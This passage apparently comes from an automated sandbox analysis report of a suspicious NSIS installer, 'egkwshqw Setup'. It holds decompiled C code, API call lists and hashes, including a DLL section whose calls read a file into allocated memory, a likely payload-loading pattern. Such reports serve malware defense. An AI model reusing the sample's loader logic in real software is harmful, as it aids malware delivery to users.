                                                  • ExitProcess.KERNEL32 ref: 0040353A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                  • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$Xy$\Temp$egkwshqw Setup$~nsu
                                                  • API String ID: 3469842172-2001404842
                                                  • Opcode ID: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                                  • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
                                                  • Opcode Fuzzy Hash: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                                  • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				struct _WIN32_FIND_DATAA _v332;
                                                  				signed int _t37;
                                                  				char* _t49;
                                                  				signed int _t52;
                                                  				signed int _t55;
                                                  				signed int _t61;
                                                  				signed int _t63;
                                                  				void* _t65;
                                                  				signed int _t68;
                                                  				CHAR* _t70;
                                                  				CHAR* _t72;
                                                  				char* _t75;
                                                  
                                                  				_t72 = _a4;
                                                  				_t37 = E0040579B(__eflags, _t72);
                                                  				_v12 = _t37;
                                                  				if((_a8 & 0x00000008) != 0) {
                                                  					_t63 = DeleteFileA(_t72); // executed
                                                  					asm("sbb eax, eax");
                                                  					_t65 =  ~_t63 + 1;
                                                  					 *0x42eca8 =  *0x42eca8 + _t65;
                                                  					return _t65;
                                                  				}
                                                  				_t68 = _a8 & 0x00000001;
                                                  				__eflags = _t68;
                                                  				_v8 = _t68;
                                                  				if(_t68 == 0) {
                                                  					L5:
                                                  					E00405BC7(0x42b0a8, _t72);
                                                  					__eflags = _t68;
                                                  					if(_t68 == 0) {
                                                  						E00405701(_t72);
                                                  					} else {
                                                  						lstrcatA(0x42b0a8, "\*.*");
                                                  					}
                                                  					__eflags =  *_t72;
                                                  					if( *_t72 != 0) {
                                                  						L10:
                                                  						lstrcatA(_t72, 0x409010);
                                                  						L11:
                                                  						_t70 =  &(_t72[lstrlenA(_t72)]);
                                                  						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
                                                  						__eflags = _t37 - 0xffffffff;
                                                  						_a4 = _t37;
                                                  						if(_t37 == 0xffffffff) {
                                                  							L29:
                                                  							__eflags = _v8;
                                                  							if(_v8 != 0) {
                                                  								_t31 = _t70 - 1;
                                                  								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                  								__eflags =  *_t31;
                                                  							}
                                                  							goto L31;
                                                  						} else {
                                                  							goto L12;
                                                  						}
                                                  						do {
                                                  							L12:
                                                  							_t75 =  &(_v332.cFileName);
                                                  							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
                                                  							__eflags =  *_t49;
                                                  							if( *_t49 != 0) {
                                                  								__eflags = _v332.cAlternateFileName;
                                                  								if(_v332.cAlternateFileName != 0) {
                                                  									_t75 =  &(_v332.cAlternateFileName);
                                                  								}
                                                  							}
                                                  							__eflags =  *_t75 - 0x2e;
                                                  							if( *_t75 != 0x2e) {
                                                  								L19:
                                                  								E00405BC7(_t70, _t75);
                                                  								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                  								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                  									E0040587F(_t72);
                                                  									_t52 = DeleteFileA(_t72);
                                                  									__eflags = _t52;
                                                  									if(_t52 != 0) {
                                                  										E00404EB3(0xfffffff2, _t72);
                                                  									} else {
                                                  										__eflags = _a8 & 0x00000004;
                                                  										if((_a8 & 0x00000004) == 0) {
                                                  											 *0x42eca8 =  *0x42eca8 + 1;
                                                  										} else {
                                                  											E00404EB3(0xfffffff1, _t72);
                                                  											E00405915(__eflags, _t72, 0);
                                                  										}
                                                  									}
                                                  								} else {
                                                  									__eflags = (_a8 & 0x00000003) - 3;
                                                  									if(__eflags == 0) {
                                                  										E004054EC(_t70, __eflags, _t72, _a8);
                                                  									}
                                                  								}
                                                  								goto L27;
                                                  							}
                                                  							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                  							__eflags = _t61;
                                                  							if(_t61 == 0) {
                                                  								goto L27;
                                                  							}
                                                  							__eflags = _t61 - 0x2e;
                                                  							if(_t61 != 0x2e) {
                                                  								goto L19;
                                                  							}
                                                  							__eflags =  *((char*)(_t75 + 2));
                                                  							if( *((char*)(_t75 + 2)) == 0) {
                                                  								goto L27;
                                                  							}
                                                  							goto L19;
                                                  							L27:
                                                  							_t55 = FindNextFileA(_a4,  &_v332);
                                                  							__eflags = _t55;
                                                  						} while (_t55 != 0);
                                                  						_t37 = FindClose(_a4);
                                                  						goto L29;
                                                  					}
                                                  					__eflags =  *0x42b0a8 - 0x5c;
                                                  					if( *0x42b0a8 != 0x5c) {
                                                  						goto L11;
                                                  					}
                                                  					goto L10;
                                                  				} else {
                                                  					__eflags = _t37;
                                                  					if(_t37 == 0) {
                                                  						L31:
                                                  						__eflags = _v8;
                                                  						if(_v8 == 0) {
                                                  							L39:
                                                  							return _t37;
                                                  						}
                                                  						__eflags = _v12;
                                                  						if(_v12 != 0) {
                                                  							_t37 = E00405EC2(_t72);
                                                  							__eflags = _t37;
                                                  							if(_t37 == 0) {
                                                  								goto L39;
                                                  							}
                                                  							E004056BA(_t72);
                                                  							E0040587F(_t72);
                                                  							_t37 = RemoveDirectoryA(_t72);
                                                  							__eflags = _t37;
                                                  							if(_t37 != 0) {
                                                  								return E00404EB3(0xffffffe5, _t72);
                                                  							}
                                                  							__eflags = _a8 & 0x00000004;
                                                  							if((_a8 & 0x00000004) == 0) {
                                                  								goto L33;
                                                  							}
                                                  							E00404EB3(0xfffffff1, _t72);
                                                  							return E00405915(__eflags, _t72, 0);
                                                  						}
                                                  						L33:
                                                  						 *0x42eca8 =  *0x42eca8 + 1;
                                                  						return _t37;
                                                  					}
                                                  					__eflags = _a8 & 0x00000002;
                                                  					if((_a8 & 0x00000002) == 0) {
                                                  						goto L31;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  			}


















                                                  APIs
                                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
                                                  • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
                                                  • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
                                                  • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
                                                  • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
                                                  • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
                                                  • FindClose.KERNEL32(?), ref: 0040564F
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004054F6
                                                  • \*.*, xrefs: 0040554E
                                                  • "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" , xrefs: 004054EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-4194315094
                                                  • Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                                  • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
                                                  • Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                                  • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100154E0
                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,1001518E,7FC6FA16,1001534D), ref: 1001550A
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,1001518E,7FC6FA16), ref: 10015521
                                                  • VirtualAlloc.KERNELBASE(00000000,10003A94,00003000,00000004,?,?,?,?,?,?,?,?,?,1001518E,7FC6FA16,1001534D), ref: 10015543
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,000000FF,?,?,?,?,?,?,?,?,?,1001518E,7FC6FA16,1001534D,00000000,00000000), ref: 100155B6
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,000000FF,?,?,?,?,?,?,?,?,?,1001518E,7FC6FA16,1001534D), ref: 100155C1
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,1001518E,7FC6FA16,1001534D,00000000), ref: 1001560C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                  • String ID:
                                                  • API String ID: 656311269-0
                                                  • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                  • Instruction ID: be604c5f9bc48b9018abf98c0b0f8c1a8723c06fec892b860f8cc16a0d14625b
                                                  • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                  • Instruction Fuzzy Hash: 8161BD34E00708EBDB10DBA4D895BAEBBBAEF48651F248019F911EF290DB71DD818B54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Heap$AllocateProcessProtectVirtual
                                                  • String ID: @
                                                  • API String ID: 1791181427-2766056989
                                                  • Opcode ID: 23ce1d4863a3dd71f9d5da21c6f6f24ee37ec8926ca1f29359c45b0b9d6f69f9
                                                  • Instruction ID: 208f6a4299a1f7e12c96a0e85f374d3c721a78b09b1983f47698f4133cb92821
                                                  • Opcode Fuzzy Hash: 23ce1d4863a3dd71f9d5da21c6f6f24ee37ec8926ca1f29359c45b0b9d6f69f9
                                                  • Instruction Fuzzy Hash: A2B1D926E191E88ACF068BBD44629EEBFF15F5E191F0D058AECD177382C5A05C04DBB6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405EC2(CHAR* _a4) {
                                                  				void* _t2;
                                                  
                                                  				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
                                                  				if(_t2 == 0xffffffff) {
                                                  					return 0;
                                                  				}
                                                  				FindClose(_t2);
                                                  				return 0x42c0f0;
                                                  			}





                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
                                                  • FindClose.KERNEL32(00000000), ref: 00405ED9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                  • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
                                                  • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                  • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                  				struct HWND__* _v32;
                                                  				void* _v84;
                                                  				void* _v88;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t35;
                                                  				signed int _t37;
                                                  				signed int _t39;
                                                  				intOrPtr _t44;
                                                  				struct HWND__* _t49;
                                                  				signed int _t67;
                                                  				struct HWND__* _t73;
                                                  				signed int _t86;
                                                  				struct HWND__* _t91;
                                                  				signed int _t99;
                                                  				int _t103;
                                                  				signed int _t115;
                                                  				signed int _t116;
                                                  				int _t117;
                                                  				signed int _t122;
                                                  				struct HWND__* _t125;
                                                  				struct HWND__* _t126;
                                                  				int _t127;
                                                  				long _t130;
                                                  				int _t132;
                                                  				int _t133;
                                                  				void* _t134;
                                                  				void* _t142;
                                                  
                                                  				_t115 = _a8;
                                                  				if(_t115 == 0x110 || _t115 == 0x408) {
                                                  					_t35 = _a12;
                                                  					_t125 = _a4;
                                                  					__eflags = _t115 - 0x110;
                                                  					 *0x42a084 = _t35;
                                                  					if(_t115 == 0x110) {
                                                  						 *0x42ec28 = _t125;
                                                  						 *0x42a098 = GetDlgItem(_t125, 1);
                                                  						_t91 = GetDlgItem(_t125, 2);
                                                  						_push(0xffffffff);
                                                  						_push(0x1c);
                                                  						 *0x429060 = _t91;
                                                  						E00403E83(_t125);
                                                  						SetClassLongA(_t125, 0xfffffff2,  *0x42e408); // executed
                                                  						 *0x42e3ec = E0040140B(4);
                                                  						_t35 = 1;
                                                  						__eflags = 1;
                                                  						 *0x42a084 = 1;
                                                  					}
                                                  					_t122 =  *0x4091ac; // 0xffffffff
                                                  					_t133 = 0;
                                                  					_t130 = (_t122 << 6) +  *0x42ec40;
                                                  					__eflags = _t122;
                                                  					if(_t122 < 0) {
                                                  						L34:
                                                  						E00403ECF(0x40b);
                                                  						while(1) {
                                                  							_t37 =  *0x42a084;
                                                  							 *0x4091ac =  *0x4091ac + _t37;
                                                  							_t130 = _t130 + (_t37 << 6);
                                                  							_t39 =  *0x4091ac; // 0xffffffff
                                                  							__eflags = _t39 -  *0x42ec44; // 0x2
                                                  							if(__eflags == 0) {
                                                  								E0040140B(1);
                                                  							}
                                                  							__eflags =  *0x42e3ec - _t133; // 0x0
                                                  							if(__eflags != 0) {
                                                  								break;
                                                  							}
                                                  							_t44 =  *0x42ec44; // 0x2
                                                  							__eflags =  *0x4091ac - _t44; // 0xffffffff
                                                  							if(__eflags >= 0) {
                                                  								break;
                                                  							}
                                                  							_t116 =  *(_t130 + 0x14);
                                                  							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
                                                  							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                  							_push(0xfffffc19);
                                                  							E00403E83(_t125);
                                                  							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                  							_push(0xfffffc1b);
                                                  							E00403E83(_t125);
                                                  							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                  							_push(0xfffffc1a);
                                                  							E00403E83(_t125);
                                                  							_t49 = GetDlgItem(_t125, 3);
                                                  							__eflags =  *0x42ecac - _t133; // 0x0
                                                  							_v32 = _t49;
                                                  							if(__eflags != 0) {
                                                  								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                  								__eflags = _t116;
                                                  							}
                                                  							ShowWindow(_t49, _t116 & 0x00000008);
                                                  							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                  							E00403EA5(_t116 & 0x00000002);
                                                  							_t117 = _t116 & 0x00000004;
                                                  							EnableWindow( *0x429060, _t117);
                                                  							__eflags = _t117 - _t133;
                                                  							if(_t117 == _t133) {
                                                  								_push(1);
                                                  							} else {
                                                  								_push(_t133);
                                                  							}
                                                  							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                  							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                  							__eflags =  *0x42ecac - _t133; // 0x0
                                                  							if(__eflags == 0) {
                                                  								_push( *0x42a098);
                                                  							} else {
                                                  								SendMessageA(_t125, 0x401, 2, _t133);
                                                  								_push( *0x429060);
                                                  							}
                                                  							E00403EB8();
                                                  							E00405BC7(0x42a0a0, "egkwshqw Setup");
                                                  							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                  							SetWindowTextA(_t125, 0x42a0a0);
                                                  							_push(_t133);
                                                  							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                  							__eflags = _t67;
                                                  							if(_t67 != 0) {
                                                  								continue;
                                                  							} else {
                                                  								__eflags =  *_t130 - _t133;
                                                  								if( *_t130 == _t133) {
                                                  									continue;
                                                  								}
                                                  								__eflags =  *(_t130 + 4) - 5;
                                                  								if( *(_t130 + 4) != 5) {
                                                  									DestroyWindow( *0x42e3f8);
                                                  									 *0x429870 = _t130;
                                                  									__eflags =  *_t130 - _t133;
                                                  									if( *_t130 <= _t133) {
                                                  										goto L58;
                                                  									}
                                                  									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
                                                  									__eflags = _t73 - _t133;
                                                  									 *0x42e3f8 = _t73;
                                                  									if(_t73 == _t133) {
                                                  										goto L58;
                                                  									}
                                                  									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                  									_push(6);
                                                  									E00403E83(_t73);
                                                  									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                  									ScreenToClient(_t125, _t134 + 0x10);
                                                  									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                  									_push(_t133);
                                                  									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                  									__eflags =  *0x42e3ec - _t133; // 0x0
                                                  									if(__eflags != 0) {
                                                  										goto L61;
                                                  									}
                                                  									ShowWindow( *0x42e3f8, 8);
                                                  									E00403ECF(0x405);
                                                  									goto L58;
                                                  								}
                                                  								__eflags =  *0x42ecac - _t133; // 0x0
                                                  								if(__eflags != 0) {
                                                  									goto L61;
                                                  								}
                                                  								__eflags =  *0x42eca0 - _t133; // 0x0
                                                  								if(__eflags != 0) {
                                                  									continue;
                                                  								}
                                                  								goto L61;
                                                  							}
                                                  						}
                                                  						DestroyWindow( *0x42e3f8);
                                                  						 *0x42ec28 = _t133;
                                                  						EndDialog(_t125,  *0x429468);
                                                  						goto L58;
                                                  					} else {
                                                  						__eflags = _t35 - 1;
                                                  						if(_t35 != 1) {
                                                  							L33:
                                                  							__eflags =  *_t130 - _t133;
                                                  							if( *_t130 == _t133) {
                                                  								goto L61;
                                                  							}
                                                  							goto L34;
                                                  						}
                                                  						_push(0);
                                                  						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                  						__eflags = _t86;
                                                  						if(_t86 == 0) {
                                                  							goto L33;
                                                  						}
                                                  						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
                                                  						__eflags =  *0x42e3ec - _t133; // 0x0
                                                  						return 0 | __eflags == 0x00000000;
                                                  					}
                                                  				} else {
                                                  					_t125 = _a4;
                                                  					_t133 = 0;
                                                  					if(_t115 == 0x47) {
                                                  						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
                                                  					}
                                                  					if(_t115 == 5) {
                                                  						asm("sbb eax, eax");
                                                  						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
                                                  					}
                                                  					if(_t115 != 0x40d) {
                                                  						__eflags = _t115 - 0x11;
                                                  						if(_t115 != 0x11) {
                                                  							__eflags = _t115 - 0x111;
                                                  							if(_t115 != 0x111) {
                                                  								L26:
                                                  								return E00403EEA(_t115, _a12, _a16);
                                                  							}
                                                  							_t132 = _a12 & 0x0000ffff;
                                                  							_t126 = GetDlgItem(_t125, _t132);
                                                  							__eflags = _t126 - _t133;
                                                  							if(_t126 == _t133) {
                                                  								L13:
                                                  								__eflags = _t132 - 1;
                                                  								if(_t132 != 1) {
                                                  									__eflags = _t132 - 3;
                                                  									if(_t132 != 3) {
                                                  										_t127 = 2;
                                                  										__eflags = _t132 - _t127;
                                                  										if(_t132 != _t127) {
                                                  											L25:
                                                  											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
                                                  											goto L26;
                                                  										}
                                                  										__eflags =  *0x42ecac - _t133; // 0x0
                                                  										if(__eflags == 0) {
                                                  											_t99 = E0040140B(3);
                                                  											__eflags = _t99;
                                                  											if(_t99 != 0) {
                                                  												goto L26;
                                                  											}
                                                  											 *0x429468 = 1;
                                                  											L21:
                                                  											_push(0x78);
                                                  											L22:
                                                  											E00403E5C();
                                                  											goto L26;
                                                  										}
                                                  										E0040140B(_t127);
                                                  										 *0x429468 = _t127;
                                                  										goto L21;
                                                  									}
                                                  									__eflags =  *0x4091ac - _t133; // 0xffffffff
                                                  									if(__eflags <= 0) {
                                                  										goto L25;
                                                  									}
                                                  									_push(0xffffffff);
                                                  									goto L22;
                                                  								}
                                                  								_push(_t132);
                                                  								goto L22;
                                                  							}
                                                  							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                  							_t103 = IsWindowEnabled(_t126);
                                                  							__eflags = _t103;
                                                  							if(_t103 == 0) {
                                                  								goto L61;
                                                  							}
                                                  							goto L13;
                                                  						}
                                                  						SetWindowLongA(_t125, _t133, _t133);
                                                  						return 1;
                                                  					} else {
                                                  						DestroyWindow( *0x42e3f8);
                                                  						 *0x42e3f8 = _a12;
                                                  						L58:
                                                  						if( *0x42b0a0 == _t133) {
                                                  							_t142 =  *0x42e3f8 - _t133; // 0x0
                                                  							if(_t142 != 0) {
                                                  								ShowWindow(_t125, 0xa);
                                                  								 *0x42b0a0 = 1;
                                                  							}
                                                  						}
                                                  						L61:
                                                  						return 0;
                                                  					}
                                                  				}
                                                  			}

































                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
                                                  • ShowWindow.USER32(?), ref: 00403A09
                                                  • DestroyWindow.USER32 ref: 00403A1D
                                                  • SetWindowLongA.USER32 ref: 00403A39
                                                  • GetDlgItem.USER32 ref: 00403A5A
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6E
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403A75
                                                  • GetDlgItem.USER32 ref: 00403B23
                                                  • GetDlgItem.USER32 ref: 00403B2D
                                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B47
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B98
                                                  • GetDlgItem.USER32 ref: 00403C3E
                                                  • ShowWindow.USER32(00000000,?), ref: 00403C5F
                                                  • EnableWindow.USER32(?,?), ref: 00403C71
                                                  • EnableWindow.USER32(?,?), ref: 00403C8C
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
                                                  • EnableMenuItem.USER32 ref: 00403CA9
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC1
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD4
                                                  • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,egkwshqw Setup), ref: 00403CFD
                                                  • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
                                                  • ShowWindow.USER32(?,0000000A), ref: 00403E40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                  • String ID: egkwshqw Setup
                                                  • API String ID: 4050669955-2990416480
                                                  • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                  • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
                                                  • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                  • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E0040361A(void* __eflags) {
                                                  				intOrPtr _v4;
                                                  				intOrPtr _v8;
                                                  				int _v12;
                                                  				int _v16;
                                                  				char _v20;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t20;
                                                  				signed int _t24;
                                                  				void* _t28;
                                                  				void* _t30;
                                                  				int _t31;
                                                  				void* _t34;
                                                  				int _t37;
                                                  				int _t38;
                                                  				intOrPtr _t39;
                                                  				int _t42;
                                                  				intOrPtr _t60;
                                                  				char _t62;
                                                  				CHAR* _t64;
                                                  				signed char _t68;
                                                  				struct HINSTANCE__* _t76;
                                                  				CHAR* _t79;
                                                  				intOrPtr _t81;
                                                  				CHAR* _t85;
                                                  
                                                  				_t81 =  *0x42ec30; // 0x79ee58
                                                  				_t20 = E00405F57(3);
                                                  				_t88 = _t20;
                                                  				if(_t20 == 0) {
                                                  					_t79 = 0x42a0a0;
                                                  					"1033" = 0x7830;
                                                  					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
                                                  					__eflags =  *0x42a0a0;
                                                  					if(__eflags == 0) {
